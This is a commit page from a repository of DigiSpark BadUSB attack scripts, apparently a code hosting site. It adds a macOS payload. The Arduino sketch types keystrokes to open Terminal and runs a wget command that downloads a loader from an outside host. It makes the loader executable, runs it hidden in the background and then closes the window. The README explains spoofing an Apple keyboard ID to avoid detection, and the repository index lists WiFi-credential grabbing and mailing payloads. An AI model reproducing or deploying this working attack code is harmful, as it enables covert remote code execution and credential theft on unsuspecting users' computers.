adil
/
DigiSpark-Scripts
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

+ add macos payload script

This commit is contained in:
Abdullah Alhazmy 2020-10-26 11:14:32 +03:00
parent aa45323b35
commit ccf801503d
3 changed files with 49 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
MacOS_Payload/MacOS_payload.ino Normal file
View File

@ -0,0 +1,37 @@
#include "DigiKeyboard.h"
/***
*
* This is an attack for Mac (OSX) machines. It opens up a terminal window, and executes the bash command. It then downloads the loader, sets it to executable,
* executes it, and closes the terminal window.
*
***/
#define MOD_CMD_LEFT 0x00000008
void setup() {
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("terminal");
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("bash");
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print("nohup wget https://sheep.casa/payloads/linux_loader -P /tmp && nohup chmod +x /tmp/linux_loader && nohup /tmp/linux_loader & exit");
DigiKeyboard.delay(500);
DigiKeyboard.println("disown $!");
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_Q, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(10000);
}
void loop() {
}

10
MacOS_Payload/README.md Normal file
View File

@ -0,0 +1,10 @@
# Mac (OSX) Payload
In order to prevent the keyboard configuration dialog box from appearing when the DigiSpark is plugged into an Apple computer, we must configure the DigiSpark to appear as if its an Apple keyboard.
VID and PID are defined in the file `~/.arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/usbconfig.h` We will replace the existing file with a modified Apple version when compiling the script for OSX. When we change Vendor Name and Device Name, we also have to adapt the constants for the name length.
It is very similar to what weve used to exploit Linux machines. The major difference is the way the terminal is opened. Weve had to modify our OSX version to use `DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);`, which will open Spotlight search. The code will delay for .5 seconds, and search `terminal`, delay for .5 seconds, and press enter, opening the terminal.
After this, in order to ensure we arent using Z Shell, well enter `bash`. From this point on the rest of the code is exactly the same as our Linux payload. It too downloads linux_loader, which downloads and runs `linux_payload.py`.

2
README.md
View File

@ -23,6 +23,7 @@ Configure the Arduino IDE for the DigiSpark using: https://digistump.com/wiki/di
- **WiFi_Profile_Grabber**: Extracts wifi profiles and saves the csv to a USB drive - **WiFi_Profile_Grabber**: Extracts wifi profiles and saves the csv to a USB drive
- **WiFi_Profile_Mailer**: Writes the wireless network credentials to a csv file and emails it - **WiFi_Profile_Mailer**: Writes the wireless network credentials to a csv file and emails it
- **Window_Jammer**: Spams ALT + F4 and CTRL + W key combos to force close all active windows - **Window_Jammer**: Spams ALT + F4 and CTRL + W key combos to force close all active windows
- **MacOS_Payload**: This is an attack for Mac (OSX) machines. It opens up a terminal window, and executes the bash command. It then downloads the loader, sets it to executable, executes it, and closes the terminal window.
# See the scripts in action # See the scripts in action
@ -43,6 +44,7 @@ Click the gifs to see the full video
- **Vel1khaN** - **Vel1khaN**
- **slipperyavocado** - **slipperyavocado**
- **bernsteining** - **bernsteining**
- **alhazmy13**
# Resources # Resources